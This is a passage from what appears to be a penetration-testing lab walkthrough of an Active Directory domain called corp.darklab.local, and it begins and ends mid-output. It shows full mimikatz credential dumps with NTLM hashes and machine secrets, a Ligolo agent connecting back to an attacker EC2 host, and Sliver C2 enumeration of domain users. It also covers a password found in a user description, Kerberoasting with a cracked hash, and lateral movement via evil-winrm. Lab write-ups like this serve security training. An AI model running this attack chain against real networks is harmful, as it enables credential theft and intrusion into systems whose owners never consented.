* Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEB-SRV01$
Domain : CORP
Logon Server : (null)
Logon Time : 11/6/2024 3:23:30 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEB-SRV01$
* Domain : CORP
* NTLM : 2721539d17b4772c0b4b43a5aecaa0b1
* SHA1 : 90d410b567bdd199d3ce107e440219ef43b80982
* DPAPI : 90d410b567bdd199d3ce107e440219ef
tspkg :
wdigest :
* Username : WEB-SRV01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : web-srv01$
* Domain : CORP.DARKLAB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 30363 (00000000:0000769b)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 11/6/2024 3:23:29 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : WEB-SRV01$
* Domain : CORP
* NTLM : 2721539d17b4772c0b4b43a5aecaa0b1
* SHA1 : 90d410b567bdd199d3ce107e440219ef43b80982
* DPAPI : 90d410b567bdd199d3ce107e440219ef
tspkg :
wdigest :
* Username : WEB-SRV01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : WEB-SRV01$
* Domain : corp.darklab.local
* Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6
ssp :
credman :
Authentication Id : 0 ; 30281 (00000000:00007649)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 11/6/2024 3:23:29 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : WEB-SRV01$
* Domain : CORP
* NTLM : 2721539d17b4772c0b4b43a5aecaa0b1
* SHA1 : 90d410b567bdd199d3ce107e440219ef43b80982
* DPAPI : 90d410b567bdd199d3ce107e440219ef
tspkg :
wdigest :
* Username : WEB-SRV01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : WEB-SRV01$
* Domain : corp.darklab.local
* Password : d6 59 b8 c1 30 ac 21 32 be ad ce c5 db e2 0b 19 63 86 5e 18 84 a9 e9 79 74 59 ad 38 59 83 c5 2c 41 2f 28 b8 a7 e1 45 31 c2 0d 66 d7 5d fc 1f 82 d2 27 b0 53 d6 b9 bc f7 a8 9f c9 04 11 40 bc bb 7d d3 14 64 87 c8 7d 58 1e d7 a6 56 c0 d3 11 a0 61 e2 77 58 ea 6a f6 9f cb 66 bb 32 21 d0 19 22 7c c6 23 d6 b5 4c 41 a2 d5 44 82 db 1f 26 7a 1a 04 62 40 b0 58 d8 d1 a3 b7 d3 fa 82 01 21 c9 5d 6d 7a 06 1d 63 04 9c 95 0a a1 59 26 52 fa e3 50 a1 61 6a 1a 72 ee 09 0e 39 96 32 da 52 11 9b 1f ab a9 e3 d5 d1 f3 e8 70 dc 40 7f 47 bc dc 4a 29 a1 f4 ae c2 4e dc cc 6a c6 cd 67 95 10 d5 68 2a b3 d3 8a 93 98 c4 f0 20 e2 e7 56 13 95 0c 4c f2 82 b7 4b 15 7b 9e f5 f2 14 46 35 0d 29 88 f0 46 36 ad 0d 4b 1a fd 74 68 37 06 24 32 7a 95 26 e6
ssp :
credman :
Authentication Id : 0 ; 29038 (00000000:0000716e)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 11/6/2024 3:23:29 AM
SID :
msv :
[00000003] Primary
* Username : WEB-SRV01$
* Domain : CORP
* NTLM : 2721539d17b4772c0b4b43a5aecaa0b1
* SHA1 : 90d410b567bdd199d3ce107e440219ef43b80982
* DPAPI : 90d410b567bdd199d3ce107e440219ef
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 11/6/2024 3:23:32 AM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 79842 (00000000:000137e2)
Session : Service from 0
User Name : web_root
Domain : WEB-SRV01
Logon Server : WEB-SRV01
Logon Time : 11/6/2024 3:23:32 AM
SID : S-1-5-21-496616251-2340469536-2080137254-1008
msv :
[00000003] Primary
* Username : web_root
* Domain : WEB-SRV01
* NTLM : d916b49871015c0be5809b842afb03b7
* SHA1 : 5d9c4c7f658e56a63aea995ae2e3eea025ea8191
* DPAPI : 5d9c4c7f658e56a63aea995ae2e3eea0
tspkg :
wdigest :
* Username : web_root
* Domain : WEB-SRV01
* Password : (null)
kerberos :
* Username : web_root
* Domain : WEB-SRV01
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 11/6/2024 3:23:31 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEB-SRV01$
Domain : CORP
Logon Server : (null)
Logon Time : 11/6/2024 3:23:29 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEB-SRV01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : web-srv01$
* Domain : CORP.DARKLAB.LOCAL
* Password : (null)
ssp :
credman :
sudo ip tuntap add user kali mode tun ligoloEnable the new interface
sudo ip link set ligolo upStart the pivoting server
ligolo -selfcertOn the compromised machine, upload the Ligolo agent and execute it to connect back to the attacker's machine.
ligolo.exe -connect <EC2_IP_ADDRESS>:11601 -ignore-certOnce that is done, a connection will appear on Ligolo, which you have to interact with it with the command session and followed by the command start to start tunneling through Web-SRV01.
Before anything else, let's start by enumerating the users on the domain, if possible. This can be done with net users /domain. To enumerate a specific user, use net user <USERNAME> /domain
sliver (SOLID_DEVIANCE) > execute -o net user alexwong /domain
[*] Output:
The request will be processed at a domain controller for domain corp.darklab.local.
User name alexwong
Full Name Alex Wong
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/17/2024 6:10:10 AM
Password expires Never
Password changeable 9/18/2024 6:10:10 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/21/2024 7:39:38 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Manager *Domain Users
The command completed successfully.sliver (SOLID_DEVIANCE) > execute -o net user thomaschan /domain
[*] Output:
The request will be processed at a domain controller for domain corp.darklab.local.
User name thomaschan
Full Name Thomas Chan
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/24/2024 8:03:44 AM
Password expires Never
Password changeable 9/25/2024 8:03:44 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/23/2024 1:46:39 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.net user stevenho /domain
The request will be processed at a domain controller for domain corp.darklab.local.
User name stevenho
Full Name Steven Ho
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/19/2024 7:51:21 AM
Password expires Never
Password changeable 9/20/2024 7:51:21 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/3/2024 4:27:55 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Manager *Domain Users
The command completed successfully.net user webservice /domain
The request will be processed at a domain controller for domain corp.darklab.local.
User name webservice
Full Name WebService
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/24/2024 8:04:28 AM
Password expires Never
Password changeable 9/25/2024 8:04:28 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/19/2024 6:53:38 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.net user tester /domain
The request will be processed at a domain controller for domain corp.darklab.local.
User name tester
Full Name Tester
Comment PW:7S3Tzpx3l
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/19/2024 7:34:33 AM
Password expires Never
Password changeable 9/20/2024 7:34:33 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/21/2024 7:32:51 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.If you notice within the user tester, the user's credential is stored within the description. With that we have our first set of credentials!.
tester:7S3Tzpx3lThe next thing to do once you get credentials, which is literally a hack, is to run bloodhound-python to enumerate the domain to find other users, groups, policies and even machines. bloodhound-python instead of Sharphound is because the execution and collection of the Bloodhound results can be done all on the attacker's machine. You can install it with the following command:
sudo apt install bloodhound bloodhound.pyAs said before, the domain controller has the IP address of 172.31.36.211 and the domain as shown in the enumeration of the users is corp.darklab.local. With that bloodhound-python is run with the following parameters.
bloodhound-python -u tester@corp.darklab.local -p 7S3Tzpx3l -ns 172.31.36.211 -d corp.darklab.local -c AllLooking at the results, there are 4 machines, including the Domain Controller:
DEV-SRV01.CORP.DARKLAB.LOCAL
PROD-SRV01.CORP.DARKLAB.LOCAL
WEB-SRV01.CORP.DARKLAB.LOCAL
By using nslookup on the compromised machine, we are able to get the IP addresses of these machines.
DEV-SRV01.CORP.DARKLAB.LOCAL : 172.31.42.69PROD-SRV01.CORP.DARKLAB.LOCAL : 172.31.34.30Now that we have all the IP addresses of the machines, add them as a route in the new network adapter.
Now that we can tunnel through the network and have a set of credentials, let's first start by trying Kerberoasting using impacket-GetUserSPNs. This impacket script will allow you as the user to request for a Ticket-Granting-Ticket (TGT) from the Kerberos server. When the user receives the TGT, the script will then use it along with the name of the service the user wants to access to request for a Ticket-Granting-Service (TGS). The TGS will be encrypted with the service account's password hash. As you can see, the following service returned a Kerberos hash which can be cracked using hashcat.
Using hashcat to crack the hash, the results show that the credential is myspace1.
PS C:\DFIR Tools\hashcat> .\hashcat.exe -a 0 -m 13100 .\hash.txt .\rockyou.txt -r .\best64.rule --show
$krb5tgs$23$*webservice$CORP.DARKLAB.LOCAL$corp.darklab.local/webservice*$62a893e5cb5b83b018f9902ff60d90a4$321531e504dd1997c3a9569284ce3a695cd7a93b1ab1b3aaa183facba39a872904a28861b3bbb3684fc926cad2837384619b22aeb2cd3c28d5c6fc4c36b36f9bf03ec3f5924bc94b66c5525332662c2cfdee8d22d2267952bbf2054d73c2118520b808f7a2dd0064a46362f8404e379fcecd3b17c70f5159a624ad1970e75ae59ba2248eea1775f0aaa5de68031d89f2c82f8870242a12222bb993f81339e814dc656b2fc47148f3b774db14d02a90efbae646f2e0693296321e0e4077587c5d754a382acf5a830fd92c2f9abe7d547564fa9034e9c616d4468e82d483f9f42815ee54310c9f42d50f002e1667f2082ff47c05d4100caec55a1e2c3de6d43daad1c0444028970b3d35a49c1d4bbdf19b9e4bff5be52d34ffcb299d1f5863a39a8f9f2f701468c6edeca20dea1beaf3a9030f8ee4d89de6d8971f952da794bdde82ee6545dfa8e6af883175a51a1383467d0779a92ee9fa2737ef7a5f0e8cf9e9b773859185093d41af23695f25a141c621acaf4b6ab62794a83a77daf7cc8a01f597002d92292ab7b95082227885b42794a2908b6963ab8a8b070f1743378e5e4f26ca7249d20f6a3365bbab13437138a35b5ece2ea21c5c9d94a272b01363d5a279518f87fd518f1dfd9c5461c8f6254539a05335a3848e7e8e19cd3be9394d94c51910ebbb9f1c2ac53fb6b1267bb39c2dfcf61dd6aab0f80c669042381784baed5c2e1d1345a00b232bba23f801c26cca73a3447fda1debf488ca69082a2c38b13b680c6e736aba1f960817fea3546ea75d93f956d3ca6331821769d181bad0b53dfdfedde10aa9e93184ea0003e5d9796a94f32cd539164193a71345f0285a55f7206ee21eba36e6370f75167bd99ed7599638d08582362117471fed0a12f44e01a6d2aed869e20969b535322e18f933b224b30a23553711cd4362b2cb6c5fef77f1d85ea502d7d9334065b61e9ecc50226be3057b82f92310fabefecc7b03c30c4d51e326a37b78382d9af5391ba1479f058d9943f0a39898fadae6e7ac70eeba820a7d8399d8e70d55f75331b4da7fef1c864fcd77fa4b86867600b8dad9644f6b7e901e9cee86af00831c1b674fd9a071892155b7daa0f3c552ad4408cc39f1004b43f256be0b8abddc1f20cb5e915479fbe42b6756cb260c4be26fb52270718b364020f777eb6ad17fd2f736b65652ccb0158f7c8be69bb3e57c87194a86ac8da0ab37985aacb2666b5659eca116bbc9bcd2a0c1526c7d89b650c7269afaf362c6894ae1ffbd66c23b3ae4020b089f23cfae963379ac4533130befffeab6e73d0389739cf74f72074826a3f9e31506378b83175a7028a6a056ca359ebef44ef9292590ee2b22ab1a6eaf0c4ed82da0fa5b32d710350edb8b680d853cfb24e6262ec792b4ad6d3e1e8dd81a0fb7b7e487a0669abf904032a854bda9fc61d7246881d33900c57fa006ebd6529b6d4a445a54778fc6e91bb0abd8f866a0d0:myspace1nxc winrm 172.31.42.69 -u webservice -p myspace1As shown below, the set of credentials was able to access DEV-SRV01.
By using evil-winrm, the 2nd set of credentials was used to access DEV-SRV01 using the following command:
evil-winrm -i 172.31.42.69 -u webservice -p myspace1By doing whoami /all, we are a Local Admin within DEV-SRV01.
*Evil-WinRM* PS C:\Users> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
corp\webservice S-1-5-21-3483600032-2896525879-1347015629-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.Again, mimikatz was uploaded and used to check for cached credentials but nothing was found.
*Evil-WinRM* PS C:\windows\tasks> ./mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DEV-SRV01$
Domain : CORP
Logon Server : (null)
Logon Time : 11/6/2024 11:23:48 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DEV-SRV01$
* Domain : CORP
* NTLM : 684fff6a76f28089cd6aeaaf8364f51b
* SHA1 : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
* DPAPI : 8e57f40a118accbb5e7f5e418c5eeca2
tspkg :
wdigest :
* Username : DEV-SRV01$
* Domain : CORP
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
kerberos :
* Username : dev-srv01$
* Domain : CORP.DARKLAB.LOCAL
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
ssp :
credman :
Authentication Id : 0 ; 30271 (00000000:0000763f)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 11/6/2024 11:23:48 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DEV-SRV01$
* Domain : CORP
* NTLM : 684fff6a76f28089cd6aeaaf8364f51b
* SHA1 : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
* DPAPI : 8e57f40a118accbb5e7f5e418c5eeca2
tspkg :
wdigest :
* Username : DEV-SRV01$
* Domain : CORP
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
kerberos :
* Username : DEV-SRV01$
* Domain : corp.darklab.local
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
ssp :
credman :
Authentication Id : 0 ; 28984 (00000000:00007138)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 11/6/2024 11:23:47 AM
SID :
msv :
[00000003] Primary
* Username : DEV-SRV01$
* Domain : CORP
* NTLM : 684fff6a76f28089cd6aeaaf8364f51b
* SHA1 : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
* DPAPI : 8e57f40a118accbb5e7f5e418c5eeca2
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 62634 (00000000:0000f4aa)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/6/2024 11:23:49 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DEV-SRV01$
* Domain : CORP
* NTLM : b2dbac9f8b8f8023b765b1d95ab5ff74
* SHA1 : fc7d62eb509e806432c9942cd4c68e5bafee29b3
* DPAPI : fc7d62eb509e806432c9942cd4c68e5b
tspkg :
wdigest :
* Username : DEV-SRV01$
* Domain : CORP
* Password : $v:b^q]d^kOS;#m?tl4g6P4Tojx_#@@H!Z=3O_u!g2K(w2[hN<LHUQJd`t2YP3/cL,( xuuRoWn,wfaC7!X/;kMZvFk-a^N"8TxkgrQ_LQX/,4LBDh%NcAx4
kerberos :
* Username : DEV-SRV01$
* Domain : corp.darklab.local
* Password : $v:b^q]d^kOS;#m?tl4g6P4Tojx_#@@H!Z=3O_u!g2K(w2[hN<LHUQJd`t2YP3/cL,( xuuRoWn,wfaC7!X/;kMZvFk-a^N"8TxkgrQ_LQX/,4LBDh%NcAx4
ssp :
credman :
Authentication Id : 0 ; 62269 (00000000:0000f33d)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/6/2024 11:23:49 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DEV-SRV01$
* Domain : CORP
* NTLM : 684fff6a76f28089cd6aeaaf8364f51b
* SHA1 : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
* DPAPI : 8e57f40a118accbb5e7f5e418c5eeca2
tspkg :
wdigest :
* Username : DEV-SRV01$
* Domain : CORP
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
kerberos :
* Username : DEV-SRV01$
* Domain : corp.darklab.local
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 11/6/2024 11:23:49 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 30264 (00000000:00007638)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
